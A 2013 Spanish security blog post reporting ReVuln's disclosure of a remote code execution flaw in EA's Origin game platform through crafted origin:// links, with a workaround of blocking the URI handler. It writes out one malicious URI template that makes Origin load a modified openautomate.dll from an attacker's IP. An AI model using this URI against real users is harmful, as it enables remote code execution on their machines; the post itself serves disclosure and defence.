sábado, 16 de marzo de 2013

Ejecución remota de código en la plataforma de juegos Origin

Se ha publicado un estudio que revela la posibilidad de ejecutar código remoto a través de la plataforma de juegos Origin, afectando a más de los 40 millones de usuarios que acceden regularmente a sus juegos (como Crysis 3, Simcity, Battlefield...).

Los investigadores Luigi Auriemma y Donato Ferrante de la firma ReVuln, que ya alertaron de una vulnerabilidad similar en Steam en noviembre de 2012, han realizado el mismo análisis en la plataforma de Electronics Arts y han encontrado una vulnerabilidad equivalente. Según sus investigaciones un atacante remoto podría ejecutar código malicioso a través de enlaces origin:// especialmente manipulados.

Básicamente la plataforma Origin utiliza el siguiente protocolo para iniciar y comprobar la validez de un juego:

  • Inicio del ejecutable del juego que invoca a la plataforma Origin instalada en el sistema, mediante un URI personalizado al efecto "origin://"
  • Cierre del proceso del juego.
  • La plataforma Origin una vez hechas las comprobaciones DRM que indican que el juego es original, lo lanza a través del mismo URI inicial suministrado.




Este URI "origin://" como tal es accesible a través de cualquier acceso directo del sistema o desde el navegador, por lo que un atacante sólo tendría que incluir un URI malicioso en su página web, o en un correo y distribuirlo.

Los investigadores comentan que existen diferentes maneras de conseguir que se ejecute el código. En su comunicado se centran en la función OpenAutomate que permite iniciar un test de comprobación del sistema.

Una URI maliciosa utilizando este comando sería la siguiente:

origin:// comando /< ID del juego>?CommandParams = openautomate\\< IP
del atacante >\\ openautomate.dll

Donde ID es el identificador del juego instalado en el sistema y openautomate.dll la librería especialmente modificada que, aparte de ejecutar el juego, inicia el código malicioso desde la IP del atacante.

El ID del juego no es particular para cada usuario, por lo que es trivial incluir en una llamada un conjunto de IDs de juegos vulnerables por 'openautomate' para explotar la vulnerabilidad, aunque no se conozca a priori qué juego del catálogo mantiene el usuario instalado en su sistema.


En este vídeo se puede ver el proceso completo y la demostración de la vulnerabilidad:

Como solución temporal, se indica la posibilidad de desactivar o bloquear el protocolo "origin://" en el sistema y en el navegador, por lo que sólo se podría iniciar el juego desde la plataforma Origin directamente, hasta que se solucione la vulnerabilidad.

Más información:

EA Origin Insecurity (when local bugs go remote... again)




José Mesa Orihuela

No hay comentarios:

Publicar un comentario en la entrada